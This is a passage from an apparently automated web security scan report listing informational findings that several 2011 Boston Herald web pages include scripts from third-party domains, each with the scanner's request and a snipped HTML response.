<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.683. http://www.bostonherald.com/news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:22:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.684. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 93057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.685. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=rcHW801DO8kADVvc; bhpopup=on; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.2.10.1296251844; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __utmb=1.1.10.1296251844; __qca=P0-1247593866-1296251843767

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.686. http://www.bostonherald.com/news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com, s7.addthis.com, d.yimg.com, pagead2.googlesyndication.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:21:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.687. http://www.bostonherald.com/news/regional/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/

Issue detail

The response dynamically includes the following scripts from other domains:

The script sources visible in the response below are hosted on ajax.googleapis.com, cache.heraldinteractive.com and edge.quantserve.com, none of them the page's own host.

Request

GET /news/regional/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:34:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.688. http://www.bostonherald.com/news/regional/gardner_heist/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/gardner_heist/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/gardner_heist/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:40:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 68225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.689. http://www.bostonherald.com/news/regional/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view.bg?articleid=1312541&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.690. http://www.bostonherald.com/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

